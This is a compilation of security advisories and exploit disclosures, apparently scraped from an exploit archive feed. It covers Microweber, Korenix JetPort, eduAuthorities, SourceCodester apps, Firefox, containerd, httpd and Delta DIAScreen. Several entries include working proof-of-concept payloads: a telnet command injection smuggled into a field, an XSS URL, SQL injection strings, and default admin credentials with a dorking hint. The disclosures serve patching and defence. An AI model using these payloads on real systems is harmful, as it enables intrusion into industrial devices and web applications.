A Reflected Cross-site scripting (XSS) vulnerability exists in '/search' in microweber 2.0.15 and earlier allowing unauthenticated remote attackers to inject arbitrary web script or HTML via the 'keywords' parameter.

**Microweber Reflected Cross-site scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Aug 6, 2024 to the GitHub Advisory Database • Updated Aug 6, 2024

GHSA-m99v-mmg2-66vf: Microweber Reflected Cross-site scripting (XSS) vulnerability

Korenix JetPort Series version 1.2 suffers from insufficient authentication, command injection, and plaintext communication vulnerabilities.

CyberDanube Security Research 20240805-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities in JetPort Series  
              product| Korenix JetPort Series  
   vulnerable version| 1.2  
        fixed version| None  
           CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397  
               impact| High  
             homepage| https://www.korenix.com/  
                found| 2024-04-01  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The configuration service on port 600/tcp doesnt require authentication to be  
used. This allows an attacker to change the password or other critical  
information.

2) Plaintext Communication (CVE-2024-7396)  
The communication of the configuration service is transmitted in plain text.  
An attacker could use this information to sniff passwords or other critical  
information.

3) Unauthenticated Command Injection (CVE-2024-7397)  
An attacker with network access an can execute arbitrary commands as root user  
via the management service on port 600/tcp.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The management software JetPort Commander is used as an frontend for the telnet  
service on 600/tcp. While it is possible to set a password, the passwords gets  
sent to the software in cleartext and gets validated on the client software  
rather than on the device. An attacker can bypass the management software by  
using telnet to directly connect to the port. This allows him to reconfigure  
the device including passwords and access controls.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setpassword poc

target:/$ cat /tmp/com2ip.conf  
version:1.2.0  
model:JetPort5601v3  
name:JetPort5601v3-DEFAULT  
serialno:0000000000000000  
password:poc  
switchmode:redundant  
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)  
The management service uses telnet as protocol. We used tcpdump to inspect the  
traffic during a password change. The new password (newpass) is readable during  
transmission.

# sudo tcpdump -i virbr0 dst port 600 -X  
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21  
      0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.  
      0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}  
      0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw  
      0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)  
The management service on port 600/tcp is used to configure JetPort devices  
over the network. An attacker can inject arbitrary commands in multiple  
settings options. The binary ser2net receives the data via the telnet  
protocol and translates it to arguments for system() calls. For our PoC we  
used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1  
OK  
->

target:/$ ls -rtlha /tmp/  
drwxrwxr-x   17 root     0            1.0k Apr  4 10:41 ..  
-rw-r--r--    1 root     0               4 Apr  4 12:28 thttpd.pid  
-rw-r--r--    1 root     0             712 Apr  4 12:29 com2ip.conf  
-rw-r--r--    1 root     0               0 Apr  4 12:33 pwned  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.

Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends customers from Korenix to remove the device from their  
network topology.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.  
2024-05-07: Received confirmation that the issue is beeing looked into.  
2024-06-10: Contact stated that the product is considered EoL and will no  
            longer receive security updates.  
2024-06-10: Confirm receipt and telling them that we will publish the  
            advisory after our 90-days deadline.  
2024-08-05: Publication of the Advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Korenix JetPort Series 1.2 Command Injection / Insufficient Authentication

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

Gentoo Linux Security Advisory 202408-2 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #930380, #932374, #935550  
       ID: 202408-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid  
www-client/firefox-bin  < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-127.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-127.0:rapid"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.12.0:esr"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3853  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3853  
[ 4 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 5 ] CVE-2024-3855  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3855  
[ 6 ] CVE-2024-3856  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3856  
[ 7 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 8 ] CVE-2024-3858  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3858  
[ 9 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 10 ] CVE-2024-3860  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3860  
[ 11 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 12 ] CVE-2024-3862  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3862  
[ 13 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864  
[ 14 ] CVE-2024-3865  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3865  
[ 15 ] CVE-2024-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4764  
[ 16 ] CVE-2024-4765  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4765  
[ 17 ] CVE-2024-4766  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4766  
[ 18 ] CVE-2024-4771  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4771  
[ 19 ] CVE-2024-4772  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4772  
[ 20 ] CVE-2024-4773  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4773  
[ 21 ] CVE-2024-4774  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4774  
[ 22 ] CVE-2024-4775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4775  
[ 23 ] CVE-2024-4776  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4776  
[ 24 ] CVE-2024-4778  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4778  
[ 25 ] CVE-2024-5689  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5689  
[ 26 ] CVE-2024-5693  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5693  
[ 27 ] CVE-2024-5694  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5694  
[ 28 ] CVE-2024-5695  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5695  
[ 29 ] CVE-2024-5696  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5696  
[ 30 ] CVE-2024-5697  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5697  
[ 31 ] CVE-2024-5698  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5698  
[ 32 ] CVE-2024-5699  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5699  
[ 33 ] CVE-2024-5700  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5700  
[ 34 ] CVE-2024-5701  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5701  
[ 35 ] CVE-2024-5702  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5702  
[ 36 ] MFSA-2024-25  
[ 37 ] MFSA-2024-26  
[ 38 ] MFSA-2024-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-02

eduAuthorities version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: eduAuthorities-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07/29/2024## Vendor: https://www.mayurik.com/## Software:https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The editid parameter appears to be vulnerable to SQL injection attacks. Thepayloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were eachsubmitted in the editid parameter. These two requests resulted in differentresponses, indicating that the input is being incorporated into a SQL queryin an unsafe way. Note that automated difference-based tests for SQLinjection flaws can often be unreliable and are prone to false positiveresults. You should manually review the reported requests and responses toconfirm whether a vulnerability is actually present.Additionally, the payload (select*from(select(sleep(20)))a) was submittedin the editid parameter. The application took 20011 milliseconds to respondto the request, compared with 3 milliseconds for the original request,indicating that the injected SQL command caused a time delay.The attackercan get all information from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: #1* (URI)    Type: boolean-based blind    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#UiVZfrom(select(sleep(3)))a)    Type: UNION query    Title: MySQL UNION query (random number) - 3 columns    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962UNION ALL SELECT8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)---```## Reproduce:[href](https://www.patreon.com/posts/eduauthorities-1-109562178)## More:[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)## Time spent:00:37:00

eduAuthorities 1.0 SQL Injection

Gentoo Linux Security Advisory 202408-1 - Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation. Versions greater than or equal to 1.6.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: containerd: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #897960  
       ID: 202408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in containerd, the worst  
of which could lead to privilege escalation.

Background  
==========

containerd is a daemon with an API and a command line client, to manage  
containers on one machine. It uses runC to run containers according to  
the OCI specification.

Affected packages  
=================

Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-containers/containerd  < 1.6.19      >= 1.6.19

Description  
===========

Multiple vulnerabilities have been discovered in containerd. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All containerd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/containerd-1.6.19"

References  
==========

[ 1 ] CVE-2023-25153  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25153  
[ 2 ] CVE-2023-25173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-01

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Blog Site version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Blog Site 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : After LOgin index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 Cross Site Scripting 

Red Hat Security Advisory 2024-5001-03 - An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a server-side request forgery vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5001.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: httpd security updateAdvisory ID:        RHSA-2024:5001-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5001Issue date:         2024-08-06Revision:           03CVE Names:          CVE-2024-38473====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Encoding problem in mod_proxy (CVE-2024-38473)* httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38473References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2295012https://bugzilla.redhat.com/show_bug.cgi?id=2295022

Red Hat Security Advisory 2024-5001-03

View CSAF
1. EXECUTIVE SUMMARY
CVSS v4 8.5
ATTENTION: Low attack complexity
Vendor: Delta Electronics
Equipment: DIAScreen
Vulnerability: Stack-based Buffer Overflow
2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to cause a stack-based buffer overflow, resulting in execution of arbitrary code.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of Delta Electronics DIAScreen visualization software are affected:
DIAScreen: Versions prior to 1.4.2
3.2 Vulnerability Overview
3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121
A crafted DPA file could force Delta Electronics DIAScreen to overflow a stack-based buffer, which could allow an attacker to execute arbitrary code.
CVE-2024-7502 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-7502. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Energy
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Taiwan
3.4 RESEARCHER
Natnael Samson (@NattiSamson) working with Trend Micro Zero Day Initiative reported this vulnerability to CISA.
4. MITIGATIONS
Delta Electronics has released v1.4.2 of DIAScreen and recommends users install this update on all affected systems.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
5. UPDATE HISTORY
August 6, 2024: Initial Publication

Tag

#web